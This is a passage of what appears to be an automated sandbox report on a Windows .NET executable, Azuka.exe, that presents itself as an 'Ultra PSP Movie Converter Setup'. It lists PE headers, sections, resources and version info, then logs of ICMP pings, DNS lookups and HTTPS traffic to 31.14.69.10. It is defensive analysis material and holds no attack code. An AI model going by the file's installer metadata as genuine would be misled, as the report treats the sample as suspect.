                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                              Entrypoint Preview

                                                              Instruction
                                                              jmp dword ptr [00402000h]
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al

                                                              Data Directories

                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x60d00x4b.text
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x80000x5b8dc.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x640000xc.reloc
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                              Sections

                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x20000x41240x4200False0.553799715909data5.99300542363IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                              .rsrc0x80000x5b8dc0x5ba00False0.108509016883data2.36998119081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .reloc0x640000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                              Resources

                                                              NameRVASizeTypeLanguageCountry
                                                              RT_ICON0x82500x42028dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 0, next used block 0
                                                              RT_ICON0x4a2780x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                                              RT_ICON0x5aaa00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 7360, next used block 4294967167
                                                              RT_ICON0x5ecc80x25a8data
                                                              RT_ICON0x612700x10a8data
                                                              RT_ICON0x623180x988data
                                                              RT_ICON0x62ca00x468GLS_BINARY_LSB_FIRST
                                                              RT_GROUP_ICON0x631080x68data
                                                              RT_VERSION0x631700x580XENIX 8086 relocatable or 80286 small model
                                                              RT_MANIFEST0x636f00x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                              Imports

                                                              DLLImport
                                                              mscoree.dll_CorExeMain

                                                              Version Infos

                                                              DescriptionData
                                                              Translation0x0000 0x04b0
                                                              LegalCopyright
                                                              Assembly Version6.0.202.0
                                                              InternalNameAzuka.exe
                                                              FileVersion6.0.202.0
                                                              CompanyNameAone Software
                                                              LegalTrademarks
                                                              CommentsUltra PSP Movie Converter Setup
                                                              ProductNameUltra PSP Movie Converter
                                                              ProductVersion6.0.202.0
                                                              FileDescriptionUltra PSP Movie Converter Setup
                                                              OriginalFilenameAzuka.exe

                                                              Network Behavior

                                                              Snort IDS Alerts

                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                              09/28/21-12:17:32.572097ICMP382ICMP PING Windows192.168.2.5131.253.33.200
                                                              09/28/21-12:17:32.572097ICMP384ICMP PING192.168.2.5131.253.33.200
                                                              09/28/21-12:17:32.597519ICMP408ICMP Echo Reply131.253.33.200192.168.2.5
                                                              09/28/21-12:17:33.202571ICMP382ICMP PING Windows192.168.2.5142.250.185.196
                                                              09/28/21-12:17:33.202571ICMP384ICMP PING192.168.2.5142.250.185.196
                                                              09/28/21-12:17:33.221224ICMP408ICMP Echo Reply142.250.185.196192.168.2.5
                                                              09/28/21-12:17:33.956607ICMP382ICMP PING Windows192.168.2.5157.240.234.35
                                                              09/28/21-12:17:33.956607ICMP384ICMP PING192.168.2.5157.240.234.35
                                                              09/28/21-12:17:33.995412ICMP408ICMP Echo Reply157.240.234.35192.168.2.5
                                                              09/28/21-12:17:35.340300ICMP382ICMP PING Windows192.168.2.5131.253.33.200
                                                              09/28/21-12:17:35.340300ICMP384ICMP PING192.168.2.5131.253.33.200
                                                              09/28/21-12:17:35.365452ICMP408ICMP Echo Reply131.253.33.200192.168.2.5
                                                              09/28/21-12:17:35.526105ICMP382ICMP PING Windows192.168.2.5142.250.185.196
                                                              09/28/21-12:17:35.526105ICMP384ICMP PING192.168.2.5142.250.185.196
                                                              09/28/21-12:17:35.544749ICMP408ICMP Echo Reply142.250.185.196192.168.2.5
                                                              09/28/21-12:17:36.046583ICMP382ICMP PING Windows192.168.2.5157.240.17.35
                                                              09/28/21-12:17:36.046583ICMP384ICMP PING192.168.2.5157.240.17.35
                                                              09/28/21-12:17:36.059181ICMP408ICMP Echo Reply157.240.17.35192.168.2.5
                                                              09/28/21-12:17:36.534283ICMP382ICMP PING Windows192.168.2.5131.253.33.200
                                                              09/28/21-12:17:36.534283ICMP384ICMP PING192.168.2.5131.253.33.200
                                                              09/28/21-12:17:36.559330ICMP408ICMP Echo Reply131.253.33.200192.168.2.5
                                                              09/28/21-12:17:36.700038ICMP382ICMP PING Windows192.168.2.5142.250.185.196
                                                              09/28/21-12:17:36.700038ICMP384ICMP PING192.168.2.5142.250.185.196
                                                              09/28/21-12:17:36.718686ICMP408ICMP Echo Reply142.250.185.196192.168.2.5
                                                              09/28/21-12:17:37.249338ICMP382ICMP PING Windows192.168.2.5157.240.234.35
                                                              09/28/21-12:17:37.249338ICMP384ICMP PING192.168.2.5157.240.234.35
                                                              09/28/21-12:17:37.288477ICMP408ICMP Echo Reply157.240.234.35192.168.2.5
                                                              09/28/21-12:17:37.705317ICMP382ICMP PING Windows192.168.2.5131.253.33.200
                                                              09/28/21-12:17:37.705317ICMP384ICMP PING192.168.2.5131.253.33.200
                                                              09/28/21-12:17:37.730639ICMP408ICMP Echo Reply131.253.33.200192.168.2.5
                                                              09/28/21-12:17:37.888486ICMP382ICMP PING Windows192.168.2.5142.250.185.196
                                                              09/28/21-12:17:37.888486ICMP384ICMP PING192.168.2.5142.250.185.196
                                                              09/28/21-12:17:37.907409ICMP408ICMP Echo Reply142.250.185.196192.168.2.5
                                                              09/28/21-12:17:38.442898ICMP382ICMP PING Windows192.168.2.5157.240.17.35
                                                              09/28/21-12:17:38.442898ICMP384ICMP PING192.168.2.5157.240.17.35
                                                              09/28/21-12:17:38.454638ICMP408ICMP Echo Reply157.240.17.35192.168.2.5
                                                              09/28/21-12:17:43.161306ICMP382ICMP PING Windows192.168.2.5104.244.42.129
                                                              09/28/21-12:17:43.161306ICMP384ICMP PING192.168.2.5104.244.42.129
                                                              09/28/21-12:17:43.178041ICMP408ICMP Echo Reply104.244.42.129192.168.2.5
                                                              09/28/21-12:17:45.763853ICMP382ICMP PING Windows192.168.2.5104.244.42.1
                                                              09/28/21-12:17:45.763853ICMP384ICMP PING192.168.2.5104.244.42.1
                                                              09/28/21-12:17:45.780587ICMP408ICMP Echo Reply104.244.42.1192.168.2.5
                                                              09/28/21-12:17:46.967647ICMP382ICMP PING Windows192.168.2.5104.244.42.129
                                                              09/28/21-12:17:46.967647ICMP384ICMP PING192.168.2.5104.244.42.129
                                                              09/28/21-12:17:46.984341ICMP408ICMP Echo Reply104.244.42.129192.168.2.5
                                                              09/28/21-12:17:48.176739ICMP382ICMP PING Windows192.168.2.5104.244.42.193
                                                              09/28/21-12:17:48.176739ICMP384ICMP PING192.168.2.5104.244.42.193
                                                              09/28/21-12:17:48.195605ICMP408ICMP Echo Reply104.244.42.193192.168.2.5

                                                              Network Port Distribution

                                                              TCP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Sep 28, 2021 12:17:54.248964071 CEST49746443192.168.2.531.14.69.10
                                                              Sep 28, 2021 12:17:54.249011040 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:54.249444008 CEST49746443192.168.2.531.14.69.10
                                                              Sep 28, 2021 12:17:54.303137064 CEST49746443192.168.2.531.14.69.10
                                                              Sep 28, 2021 12:17:54.303163052 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:54.415555000 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:54.415704966 CEST49746443192.168.2.531.14.69.10
                                                              Sep 28, 2021 12:17:54.420767069 CEST49746443192.168.2.531.14.69.10
                                                              Sep 28, 2021 12:17:54.420778036 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:54.421188116 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:54.472188950 CEST49746443192.168.2.531.14.69.10
                                                              Sep 28, 2021 12:17:54.799618959 CEST49746443192.168.2.531.14.69.10
                                                              Sep 28, 2021 12:17:54.847131968 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.045241117 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.045308113 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.045731068 CEST49746443192.168.2.531.14.69.10
                                                              Sep 28, 2021 12:17:55.045747995 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.046616077 CEST49746443192.168.2.531.14.69.10
                                                              Sep 28, 2021 12:17:55.046724081 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.046740055 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.046885967 CEST49746443192.168.2.531.14.69.10
                                                              Sep 28, 2021 12:17:55.072731018 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.072743893 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.072779894 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.072827101 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.072834969 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.073096991 CEST49746443192.168.2.531.14.69.10
                                                              Sep 28, 2021 12:17:55.073113918 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.076936007 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.076986074 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.077199936 CEST49746443192.168.2.531.14.69.10
                                                              Sep 28, 2021 12:17:55.077282906 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.099220991 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.099281073 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.099288940 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.099330902 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.099379063 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.099410057 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.099675894 CEST49746443192.168.2.531.14.69.10
                                                              Sep 28, 2021 12:17:55.099708080 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.099721909 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.099725962 CEST49746443192.168.2.531.14.69.10
                                                              Sep 28, 2021 12:17:55.099823952 CEST49746443192.168.2.531.14.69.10
                                                              Sep 28, 2021 12:17:55.102350950 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.102370024 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.102436066 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.102468014 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.102740049 CEST49746443192.168.2.531.14.69.10
                                                              Sep 28, 2021 12:17:55.102755070 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.102914095 CEST49746443192.168.2.531.14.69.10
                                                              Sep 28, 2021 12:17:55.103730917 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.103761911 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.103789091 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.104043961 CEST49746443192.168.2.531.14.69.10
                                                              Sep 28, 2021 12:17:55.126295090 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.126332045 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.126388073 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.126543999 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.126559973 CEST49746443192.168.2.531.14.69.10
                                                              Sep 28, 2021 12:17:55.126580954 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.126591921 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.126610994 CEST49746443192.168.2.531.14.69.10
                                                              Sep 28, 2021 12:17:55.126615047 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.126779079 CEST49746443192.168.2.531.14.69.10
                                                              Sep 28, 2021 12:17:55.126790047 CEST49746443192.168.2.531.14.69.10
                                                              Sep 28, 2021 12:17:55.127839088 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.127877951 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.127918005 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.128002882 CEST49746443192.168.2.531.14.69.10
                                                              Sep 28, 2021 12:17:55.128113985 CEST49746443192.168.2.531.14.69.10
                                                              Sep 28, 2021 12:17:55.131422997 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.131463051 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.131598949 CEST49746443192.168.2.531.14.69.10
                                                              Sep 28, 2021 12:17:55.131613970 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.131736040 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.131763935 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.131886005 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.131908894 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.132005930 CEST49746443192.168.2.531.14.69.10
                                                              Sep 28, 2021 12:17:55.132019997 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.132031918 CEST49746443192.168.2.531.14.69.10
                                                              Sep 28, 2021 12:17:55.132155895 CEST49746443192.168.2.531.14.69.10
                                                              Sep 28, 2021 12:17:55.132178068 CEST49746443192.168.2.531.14.69.10
                                                              Sep 28, 2021 12:17:55.153335094 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.153403044 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.153665066 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.153704882 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.155246019 CEST49746443192.168.2.531.14.69.10
                                                              Sep 28, 2021 12:17:55.155277014 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.155343056 CEST49746443192.168.2.531.14.69.10
                                                              Sep 28, 2021 12:17:55.155352116 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.155427933 CEST49746443192.168.2.531.14.69.10
                                                              Sep 28, 2021 12:17:55.155436039 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.155461073 CEST4434974631.14.69.10192.168.2.5
                                                              Sep 28, 2021 12:17:55.155723095 CEST49746443192.168.2.531.14.69.10
                                                              Sep 28, 2021 12:17:55.163952112 CEST49746443192.168.2.531.14.69.10

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Sep 28, 2021 12:17:14.006958008 CEST6206053192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:14.028456926 CEST53620608.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:27.270009041 CEST6180553192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:27.292803049 CEST53618058.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:32.484193087 CEST5479553192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:32.503832102 CEST53547958.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:32.518971920 CEST4955753192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:32.538347006 CEST53495578.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:33.139408112 CEST6173353192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:33.159081936 CEST53617338.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:33.171531916 CEST6544753192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:33.190932035 CEST53654478.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:33.340276003 CEST5244153192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:33.359020948 CEST53524418.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:33.765621901 CEST6217653192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:33.786004066 CEST53621768.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:33.904256105 CEST5959653192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:33.923322916 CEST53595968.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:33.932734966 CEST6529653192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:33.952614069 CEST53652968.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:34.123390913 CEST6318353192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:34.143033028 CEST53631838.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:34.357966900 CEST6015153192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:34.378730059 CEST53601518.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:34.417715073 CEST5696953192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:34.448486090 CEST53569698.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:34.838607073 CEST5516153192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:34.858047962 CEST53551618.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:35.299637079 CEST5475753192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:35.317246914 CEST53547578.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:35.320863962 CEST4999253192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:35.339689016 CEST53499928.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:35.381464958 CEST6007553192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:35.398793936 CEST53600758.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:35.414982080 CEST5501653192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:35.446382046 CEST53550168.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:35.484381914 CEST6434553192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:35.503261089 CEST53643458.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:35.506236076 CEST5712853192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:35.525475025 CEST53571288.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:35.562768936 CEST5479153192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:35.582648039 CEST53547918.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:35.592691898 CEST5046353192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:35.611974955 CEST53504638.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:35.973292112 CEST5039453192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:36.020490885 CEST53503948.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:36.023938894 CEST5853053192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:36.045708895 CEST53585308.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:36.090524912 CEST5381353192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:36.111426115 CEST53538138.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:36.121283054 CEST6373253192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:36.142627954 CEST53637328.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:36.489115000 CEST5734453192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:36.508433104 CEST53573448.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:36.512536049 CEST5445053192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:36.532763004 CEST53544508.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:36.568034887 CEST5926153192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:36.587644100 CEST53592618.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:36.596040964 CEST5715153192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:36.615757942 CEST53571518.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:36.653968096 CEST5941353192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:36.674272060 CEST53594138.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:36.679847002 CEST6051653192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:36.699255943 CEST53605168.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:36.749464035 CEST5164953192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:36.771529913 CEST53516498.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:36.778726101 CEST6508653192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:36.798778057 CEST53650868.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:37.206172943 CEST5643253192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:37.226001024 CEST53564328.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:37.229633093 CEST5292953192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:37.248771906 CEST53529298.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:37.307578087 CEST6431753192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:37.328012943 CEST53643178.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:37.335550070 CEST6100453192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:37.355453014 CEST53610048.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:37.654063940 CEST5689553192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:37.682061911 CEST53568958.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:37.685337067 CEST6237253192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:37.704668045 CEST53623728.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:37.748748064 CEST6151553192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:37.768733978 CEST53615158.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:37.776559114 CEST5667553192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:37.796063900 CEST53566758.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:37.843363047 CEST5717253192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:37.865092039 CEST53571728.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:37.868196011 CEST5526753192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:37.887912989 CEST53552678.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:37.916884899 CEST5096953192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:37.937755108 CEST53509698.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:37.949146032 CEST6436253192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:37.967988014 CEST53643628.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:38.395714998 CEST5476653192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:38.415080070 CEST53547668.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:38.420818090 CEST6144653192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:38.441961050 CEST53614468.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:38.499401093 CEST5751553192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:38.517172098 CEST53575158.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:38.527813911 CEST5819953192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:38.548793077 CEST53581998.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:43.118942976 CEST6522153192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:43.137837887 CEST53652218.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:43.141413927 CEST6157353192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:43.160586119 CEST53615738.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:43.703321934 CEST5656253192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:43.722122908 CEST53565628.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:43.794462919 CEST5973653192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:43.794862032 CEST5105853192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:43.795267105 CEST5263653192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:43.812038898 CEST53510588.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:43.813257933 CEST53597368.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:43.813946962 CEST53526368.8.8.8192.168.2.5
